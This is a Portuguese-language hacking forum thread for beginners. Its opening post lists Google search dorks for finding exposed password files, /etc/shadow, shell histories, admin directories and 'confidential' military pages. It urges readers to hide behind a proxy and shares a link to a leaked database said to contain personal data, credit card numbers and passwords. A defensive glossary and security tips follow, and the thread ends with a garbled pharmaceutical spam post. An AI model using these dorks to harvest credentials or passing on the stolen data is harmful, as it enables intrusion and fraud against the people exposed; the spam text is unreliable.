    Sponsor

    Voltar ao topo
    --------------------------------------------------------------------------------

    por shadow_sjm em 09 Ago 2006, 20:11

    Continua apartir daquela palavra authors.... ela nao e repetida

    administrators.pwd.index
    authors.pwd.index
    service.pwd.index
    filetype:config web
    gobal.asax index

    allintitle: "index of/admin"
    allintitle: "index of/root"
    allintitle: sensitive filetype:doc
    allintitle: restricted filetype :mail
    allintitle: restricted filetype:doc site:gov

    inurlasswd filetype:txt
    inurl:admin filetype:db
    inurl:iisadmin
    inurl:"auth_user_file.txt"
    inurl:"wwwroot/*."

    top secret site:mil
    confidential site:mil

    allinurl: winnt/system32/ (get cmd.exe)
    allinurl:/bash_history

    intitle:"Index of" .sh_history
    intitle:"Index of" .bash_history
    intitle:"index of" passwd
    intitle:"index of" people.lst
    intitle:"index of" pwd.db
    intitle:"index of" etc/shadow
    intitle:"index of" spwd
    intitle:"index of" master.passwd
    intitle:"index of" htpasswd
    intitle:"index of" members OR accounts
    intitle:"index of" user_carts OR user_cart


    ##################
    # Banco de dados #
    ##################

    Lembrando: USE PROXY PELAMORDIDEUS!!!!!!

    Tipo, esse banco de dados foi disponibilizado pelo nosso amigo Hualdo do grupo Shadow Boys, eu não tenho nenhum envolvimento com isso, apenas estou publicando para que voce possa entender como fuinciona o mecanismo, tipo, se você fizer merda você mesmo q vai se ferrar...
    Trata-se de um banco de dados com informações pessoais, incluindo cartões de crédito e senha portanto, se voce naum tiver juizo nem clique no endereço. by Javally

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... ... _meio2.zip

    __________________________________________________ ________________________________________________

    Terminou Ufa!
    Está ai uma grande homenagem a todos do invasao com essa super-apostila
    Creditos lá em cima ^
    Qualquer coisa MP
    ok?!
    Fuiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii iiiiiiiiiiiii
    OOP (Programação Orientada a Objeto) linguagem utilizada pelo DELPHI
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... site invasao
    receita d bolo qdo o pssoal fala
    eh q eh 1 apostila pronta p vc usar
    vc clica na xave.



    é imposivel ter pirivasidade na internet, basta vc acessar algum serviço como
    o Auxílio à lista( e escolher o estado.

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    mas vc pod usar Tbm para axar um museu de paginas antigas no
    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    digite o endereço do site que pretende pesquisar e veja toda a coleção de paginas
    e layots que já foram usados em seus anos de existência.


    OR: Delimitador Variavel.
    O OR (sempre em maiuscola) é utilizado para encontrar paginas em que se encontre um outro termo de busca.
    Ao procurar, por exemplo, pelos termos :livros e Digerati: separando-os com (OR),teremos
    acesso a todas as paginas nas quais todos os termos ocorram, mesmo que ñao de forma conjunta.


    "ADSL" quando for pesquisar


    LIÇAO 20

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... site da poilcia dos estados unidos para achar as pessoas mais perigosas
    AntiOnline.com: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... Fornece notícias e produtos antihackers e antivírus

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... sites de busca de documentos;;;

    HackerWhacker: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar.... Prometendo permitir que você "veja seu computador como os hackers o vêem",
    esse site vasculha as portas do PC em busca de pontos vulneráveis.
    Você pode obter uma pesquisa na maioria das portas de graça, ou varreduras adicionais e mais profundas por uma taxa variável.
    Recomendo fazer o teste gratuito.

    HappyHacker: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar.... Descrevendo-se como um site de hacking a favor da moral,
    fornece muita informação sobre como ser hacker e proteger-se de um. Apesar de não tolerar o crime de computador,
    o site admite que as informações podem ser encaradas com fins nocivos.
    Ótima oportunidade de conhecer a mente de um hacker.

    ? Firewall pessoal: software que impede usuários não autorizados de acessar um PC isolado.
    Também impede que programas maliciosos enviem dados.
    Recomendo o ótimo firewall ZoneAlarm, da ZoneLabs, gratuito para uso pessoal: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...








    Tudo que um hacker precisa saber ( iniciantes )
    ATAQUES

    Como os hackers maliciosos causam danos?
    Eles têm acesso a ferramentas de software automatizadas cada vez mais sofisticadas que vasculham a Internet em busca de PCs vulneráveis.
    As ferramentas localizam uma máquina isolada por seu endereço IP,
    um número exclusivo que identifica um computador na Internet.
    A maioria dos computadores equipados com conexões discadas tem endereços IP dinâmicos:
    o provedor de Internet atribui-lhes um novo endereço IP a cada vez que o usuário se conecta.
    Já a maioria das conexões de alta velocidade,
    como DSL e cable modems, utiliza endereços IP constantes ou "estáticos".
    No evento improvável de um hacker decidir atacá-lo especificamente,
    o endereço estático facilita a localização.

    Um endereço IP identifica um computador,
    mas não fornece uma maneira de invadi-lo. Para entrar, o hacker tem que encontrar uma porta aberta,
    ou um ponto de conexão.
    Pense em um endereço IP como o número de uma central telefônica de um computador e na porta como um ramal.
    Em geral, essas portas são criadas pelos programas para endereçar funções de redes específicas.
    O acesso à Web, por exemplo, em geral usa a porta 80, enquanto o FTP ocupa a porta 21.
    Quando os hackers escolhem um endereço IP como alvo, vasculham a máquina em busca de portas abertas.

    Os hackers maliciosos também levam os usuários a abrir portas enviando cavalos de Tróia.
    Simulando a tática inventada pelos gregos invasores,
    um cavalo de Tróia esconde carga nociva dentro de uma concha aparentemente sem perigo.
    no nosso caso, um arquivo anexado a uma mensagem de correio eletrônico ou a um download.
    Quando você dá um duplo clique e abre o presente,
    o programa oculto se move furtivamente para causar danos no computador.
    Um dos cavalos de Tróia mais conhecidos é o Back Orifice,
    que abre uma porta no PC para que se possa explorar e assumir o controle da máquina remotamente. 06/08/07 ¦¦¦¦?????Eе
    Feche as janelas

    Como os usuários do Windows podem proteger-se?
    O primeiro passo é checar a existência de atualizações e correções para segurança no site da Microsoft.
    Se você tiver o Windows 9x,
    Windows NT,
    Windows 2000 Professional,
    Windows XP Professional,
    vá ao site Windows Update: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... e siga os links para encontrar as atualizações para seu sistema operacional.

    Além disso, para o Windows Millennium e Windows XP, desabilite a opção Compartilhamento de arquivos e impressoras,
    que abre as portas para outros computadores terem acesso a uma máquina com qualquer versão do Windows.
    Vá em Iniciar-Configurações-Painel de Controle e dê um duplo clique no ícone Rede.
    Procure o item Compartilhamento de arquivos e impressoras para redes Microsoft na lista de componentes instalados.
    Se esse item estiver presente, selecione-o e clique no botão Remover abaixo da lista de componentes.

    Você também pode proteger-se com software que bloqueia programas cavalo de Tróia.
    Qualquer bom pacote antivírus é projetado para identificar esse tipo de praga virtual,
    mas é preciso mantê-lo atualizado para derrotar as variantes mais recentes.
    Você também deve garantir que seu programa de correio eletrônico (Outlook, Outlook Express, Eudora, Incredimail, etc.)
    não abra automaticamente os arquivos anexados.

    Essas medidas isoladas, porém, só garantem segurança para uma minoria de usuários.
    "A menos que você tenha instalado seu sistema a partir do zero,
    não existe uma maneira de saber quão seguro ele realmente está".
    Brechas na segurança podem ocorrer em muitas frentes,
    usualmente em software para Internet: como o PC Anywhere, Net Meeting, Messenger (MSN ou Yahoo), ICQ, mIRC, etc.,
    que abre portas para os hackers explorarem. Cuidado com o Orkut, Gazzag, etc.!
    É importante a necessidade de acrescentar outra camada de segurança. 06/08/07 ¦¦¦¦?????Eе
    A informação é a melhor arma

    A Internet é o playground dos hackers, mas também é um ótimo lugar para aprender sobre segurança e maneiras de se proteger contra ataques.
    Eis uma amostra de endereços que fornecem informação, teste e produtos de segurança:

    AntiOnline.com: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... Fornece notícias e produtos antihackers e antivírus.
    Foi fundado por John Vranesevich, o primeiro a louvar e depois perseguir hackers.

    CERT Coordination Center: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar.... Aborda respostas, treinamento e prevenção de incidentes de segurança.
    Embora seja voltado para redes de larga escala, o site é repleto de informações úteis para usuários de PC.

    HackerWhacker: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar.... Prometendo permitir que você "veja seu computador como os hackers o vêem",
    esse site vasculha as portas do PC em busca de pontos vulneráveis.
    Você pode obter uma pesquisa na maioria das portas de graça, ou varreduras adicionais e mais profundas por uma taxa variável.
    Recomendo fazer o teste gratuito.

    HappyHacker: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar.... Descrevendo-se como um site de hacking a favor da moral,
    fornece muita informação sobre como ser hacker e proteger-se de um. Apesar de não tolerar o crime de computador,
    o site admite que as informações podem ser encaradas com fins nocivos.
    Ótima oportunidade de conhecer a mente de um hacker.

    Microsoft TechNet on Security: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar.... Voltado para profissionais de TI
    (mas que vale a pena ser visto por usuários comuns),
    é um guia para avaliar as necessidades de segurança e implementar soluções.
    Inclui atualizações de vírus e segurança para Windows, Outlook, Outlook Express e Internet Explorer. 06/08/07 ¦¦¦¦?????Eе
    Network ICE AdvICE: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar.... Coleção de FAQs,
    links e artigos sobre problemas de segurança da empresa que desenvolve o BlackICE Defender.
    SANS Institute (System Administration, Networking, and Security): Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar....
    Organização de pesquisa e educação com 96 mil membros fundada em 1989. Seu site é repleto de artigos relacionados à segurança.
    Um ótimo recurso é a lista de portas usadas por programas cavalo de Tróia.

    Secure-Me-Automated Security Testing: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar.... Esse site oferece duas pesquisas de porta gratuitas:
    um miniversão rápida e uma varredura mais profunda que o coloca em uma fila,
    às vezes por mais de uma hora. Os resultados são enviados por e-mail.

    VMyths.com (ex-Computer Virus Myths): Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar.... Hospedado pelo auto-intitulado nerd Rob Rosenberger,
    esse site dissemina lendas urbanas sobre vírus.
    O primeiro lugar aonde ir quando você recebe um e-mail alertando sobre um vírus novo.

    De acordo com a Lei de Murphy, tudo que puder dar errado, dará.
    As pessoas estão colocando mais dados críticos nos PCs e enviando outras informações confidenciais via Web.
    Também estão mudando de serviço discado baseado em modem para conexões de banda larga,
    com serviço contínuo e endereços IP fixos.

    Enquanto isso, os hackers estão adquirindo ferramentas de software mais trapaceiras e colocando mais vítimas potenciais em risco.
    A ação dos hackers, inevitavelmente, aumentará. Mas a boa notícia é que você pode estar protegido desde já. 06/08/07 ¦¦¦¦?????Eе
    Glossário de um hacker
    Segurança na Internet é um assunto complexo.
    Eis alguns termos e conceitos que os usuários de PC têm que saber.
    Ataque Denial of Service (DoS): Inunda um endereço IP com dados,
    fazendo o computador travar ou perder a conexão com a Internet.
    A maioria dos ataques DoS visa grandes servidores Web,
    com o objetivo de tornar o site alvo indisponível para outros visitantes.

    Para se comunicar na internet, os hackers e especialistas em segurança utilizam um dialeto especial.
    Veja o que significam alguns termos:

    ? Ataque Distributed Denial-of-Service (DDoS):
    utiliza diversos computadores para lançar um ataque DoS.
    Um hacker comanda vários computadores externos e os usa como plataformas para lançar o ataque,
    ampliando sua intensidade e ocultando a identidade do hacker.

    ? Hacker: a palavra surgiu nos anos 50 dentro do MIT e deriva do termo hack,
    usada para definir atividades de alta tecnologia com os quais alguns estudantes se ocupavam.
    Alguém que, deliberadamente, ganha acesso a outros computadores,
    freqüentemente sem conhecimento ou permissão do usuário.
    Hackers maliciosos fazem isso para roubar informação valiosa,
    atrapalhar serviços ou causar outros danos.

    ? Cracker: são os hackers mais radicais.
    Eles pirateiam programas e penetram em sistemas "quebrando" tudo.
    A intenção é sabotar ao máximo os grandes servidores.

    ? Carder: cracker especializado somente em fraudes com cartões de crédito.

    ? Defacer: usuário mal-intencionado que passa o tempo tentando desfigurar a página inicial de sites conhecidos.

    ? Lammer (ou ainda newbie ou script kid): iniciante.
    Tem pouco de conhecimento e usa ferramentas criadas por outros hackers para invadir computadores alheios.
    Ficam se exibindo na internet, o que é mal visto até por veteranos do crime.

    ? Honeypot (pote de mel): armadilhas para hackers.
    Um computador é servido de isca e quando é invadido, coleta informações para serem usadas em futuras defesas. 06/08/07 ¦¦¦¦?????Eе

    ? Phishing scams: um e-mail disfarçado que tenta enganar usuários com sites falsos.
    e promessas infundadas.
    Geralmente são cópias quase idênticas de páginas de bancos que levam os internautas a digitar suas senhas e números de cartão de crédito.

    ? Spoofing: ato de usar uma máquina para personificar e invadir outra.
    Isso é feito forjando o endereço de origem de um ou mais micros. Para realizar uma sessão bem-sucedida,
    crakers temporariamente "silenciam" o computador que eles estão personificando.

    ? SSL (Secure Socket Layer):
    protocolo de transmissão de dados teoricamente seguro usado para envio de senhas e número de cartão de crédito na web.

    ? Warez: programas pirateados, que antes mesmo de estarem no mercado,
    já têm seus códigos "quebrados", tornando possível identificar a chave de registro sem se pagar nada por isso.

    ? Endereço IP (Internet Protocol): o número que identifica um computador ou outro dispositivo na Internet.
    Duas máquinas conectadas diretamente à Internet não podem ter o mesmo endereço IP ao mesmo tempo.
    Computadores com endereços IP estáticos (a maioria dos sistemas com conexões DSL ou cable modem)
    sempre usam o mesmo endereço IP; computadores com endereços dinâmicos
    (a maioria dos sistemas com conexões discadas) recebem um novo endereço IP toda vez que conectam à Internet.

    ? Firewall pessoal: software que impede usuários não autorizados de acessar um PC isolado.
    Também impede que programas maliciosos enviem dados.
    Recomendo o ótimo firewall ZoneAlarm, da ZoneLabs, gratuito para uso pessoal: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    ? Porta: conexão eletrônica que permite que os dados trafeguem entre um PC cliente e um servidor através de uma rede.

    ? Varredura de Porta (scan): dados enviados por um hacker via Internet para localizar um PC ou uma rede e
    descobrir se há portas abertas que aceitem a conexão. 06/08/07 ¦¦¦¦?????Eе

    ? Modo de reserva (stealth): configuração protetora que oculta uma porta para que ela não fique visível através da Internet.
    Uma porta que foi colocada no modo de reserva não responderá a uma varredura de porta e,
    portanto, não dará sinal de que existe um computador no endereço IP vasculhado.

    ? Cavalo de Tróia: programa malicioso disfarçado em algo inofensivo,
    em geral um arquivo anexado ou um download que você abre e executa.
    Um cavalo de Tróia pode abrir o computador para as incursões do hacker. Se você recebe e-mails pelo Outlook,
    Outlook Express, Eudora, Incredimail, nunca abra anexos (attachments)
    cujo remetente vier marcado com um sinal parecido com um clipe.
    Se você não conhece a pessoa ou a empresa, não abra.
    Muita atenção quanto aos e-mails de empresas, bancos, etc., porque podem ter sido clonados. 06/08/07 ¦¦¦¦?????Eе

    --->> Fique por Dentro <<---]
    ? Existem duas conferências anuais organizadas e freqüentadas por hackers:
    a DefCon, nos EUA, e a HackMeeting, na Itália

    ? Especialistas calculam que 50 novas vulnerabilidades são descobertas por semana em programas de computador

    ? As senhas fáceis de adivinhar são as principais culpadas pelas invasões em redes domésticas e corporativas

    Os ataques que ameaçam qualquer um

    ? Você não precisa ser um internauta viciado para ser prejudicado pelos "guerreiros" virtuais -
    basta ser um cidadão comum deste mundo cada vez mais interligado por redes globais.
    A lista de especialidades dos hackers não tem fim.

    ? Há poucos anos, invasores estiveram perto de tomar o controle total dos computadores da companhia de energia da Califórnia,
    o que lhes daria o poder de interromper o fornecimento de eletricidade em toda a cidade.
    Eles "pesquisaram" nos micros por pelo menos 17 dias sem que nenhum funcionário suspeitasse.
    A invasão de sites e servidores ainda não é crime no Brasil.

    ? No início de 2003, os computadores de uma empresa que presta serviços para a Visa e para a MasterCard foram violados.
    Criminosos rastrearam informações de mais de 5 milhões de contas de cartões de crédito de clientes.
    É um tipo de crime com números consideráveis no Brasil.
    Mas na maioria das vezes os bancos preferem não informar o delito para não ficarem "manchados".
    As instituições se restringem apenas a indenizar o cliente lesado.
    É crime via Código Penal. Fraudes eletrônicas: furto art.155 - detenção de 1 a 4 anos; estelionato art.171 -
    multa e detenção de 1 a 5 anos. 06/08/07 ¦¦¦¦?????Eе

    ? No final de 2003, crackers do Brasil desfiguraram a página principal do site da Força Aérea Brasileira (FAB) e,
    nos EUA, 13 sites da Nasa,
    a agência espacial norte-americana, em protesto contra os conflitos no Iraque.
    A pichação de home pages pode ser crime tendo por base o Código Penal, artigos 138 a 145. Dano,
    calúnia, injúria ou difamação - detenção de 3 meses a 2 anos.

    ? Clientes do banco Itaú receberam e-mails em novembro de 2003,
    usando o nome do banco e afirmando que o Banco Central estaria exigindo o registro novamente via web dos
    clientes com a finalidade de se criar um novo sistema antifraude.
    O próprio Banco Central já avisou que tal exigência não existe.
    Não há legislação específica para sites clonados,
    mas pode ser crime tendo como referência fraude eletrônica,
    estelionato ou violação de privacidade 18 Set
    (22 horas atrás) Slek
    boa cara vlw!
    Last edited by V3nom; 19-09-2009, 12:21.
    Segurança no Brasil é uma total aberração,helicóptero é derrubado por favelado,e seu site admin é ownado

  • Font Size
    #2
    Legal mano parabéns pelo seu post, muito interessante para a galera que está iniciando, pois o conteúdo é uma "pincela" sobre cada assunto na área...

    Sugestão: Você poderia explicar melhorar um pouco sobre a definição da hierarquia hacker;
    Acrescentar sub-titulos em alguma partes;
    Rever o conteúdo postado pois creio que algumas coisas não funcionam mais.

    Bom no geral está de parabéns pela a iniciativa.

    Comment


    • Font Size
      #3
      JEEEZZZZZ... quanta coisa.. um poco da logica e da teoria de cada coisa mesmo mas se aprofundar em cada um é o importante

      Postado Originalmente por J3@N Ver Post
      Legal mano parabéns pelo seu post, muito interessante para a galera que está iniciando, pois o conteúdo é uma "pincela" sobre cada assunto na área...

      Sugestão: Você poderia explicar melhorar um pouco sobre a definição da hierarquia hacker;
      Acrescentar sub-titulos em alguma partes;
      Rever o conteúdo postado pois creio que algumas coisas não funcionam mais.

      Bom no geral está de parabéns pela a iniciativa.

      PS: se ele explica + vai seu muita coisa.... ta bom assim ja
      sigpic

      Comment


      • Font Size
        #4
        Perdoem pela falta de experiencia
        Segurança no Brasil é uma total aberração,helicóptero é derrubado por favelado,e seu site admin é ownado

        Comment


        • Font Size
          #5
          prometo melhorar nos proximos posts
          Segurança no Brasil é uma total aberração,helicóptero é derrubado por favelado,e seu site admin é ownado

          Comment


          • Font Size
            #6
            boa manin,
            vlws a iniciativa




            sigpic

            Visitem minha galeria: http://m2gf.deviantart.com/

            Comment


            • Font Size
              #7
              cara como que eu fasso pra baixar um pacote de hacker

              Comment


              • Font Size
                #8
                muito bom post vlw !!!!
                sigpic

                Comment


                • Font Size
                  #9
                  bom poste parabens,mas sql injection ta meio pobre eu acho?

                  Comment


                  • Font Size
                    #10
                    vlw cara muito bom.

                    Comment


                    • Font Size
                      #11
                      FIkou otimo pra quem ta comesçando assim como eu

                      vlws aee!!
                      sigpic


                      Sou apenas mais um cara querendo conhecimento!

                      Eu selebrarei a gloria do REI quando ele voltar!! e vc? Leia a Biblia!

                      Meta??so uma Ser programador GH Sonho de consumo!



                      MY OrKuT My TwiTTeR My SpacE

                      Comment


                      • Font Size
                        #12
                        Lol cara duvido q vc quem escreveu isso o.O

                        Comment


                        • Font Size
                          #13
                          Mesmo eu duvidando /\ vc ta de parabéns, pois isso vai me servir muito
                          vou lhe dar um obrigado

                          Comment


                          • Font Size
                            #14
                            Agradecimetos

                            Gostei muito, é bem explicativa.

                            Comment


                            • Font Size
                              #15
                              propecia salutary bumf

                              PROPECIA is in behalf of the treatment of cuffs's repetition curls bereavement in MEN NOT and should NOT be hardened next to women or children.

                              Women who are or may potentially be fecund compulsion not disable PROPECIA and should not working-out power crushed or dispirited PROPECIA tablets because the active ingredient may driving abnormalities of a virile mollycoddle’s coition organs. If a dame who is denotative comes into understanding with the on the up sticks ingredient in Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar..., a doctor should be consulted.
                              PROPECIA tablets are coated and will-power proscribe come close to with the leading ingredient during overfree handling, provided that the tablets are not transgressed or crushed.

                              In clinical studies to scrimp PROPECIA, a small platoon of men prepared habitual immodest side effects, such as less cupidity to bail someone missing contemporary to bed, laboriousness in achieving an erection, or a abridge in the amount of semen. Each of these side effects occurred in less than 2% of men and went away in men who stopped fetching PROPECIA because of them.

                              Although results will-power reshape, commonly you dole out down not be proficient to to advantage urge all the curls you understand lost.

                              Comment

                              X
                              Working...
                              X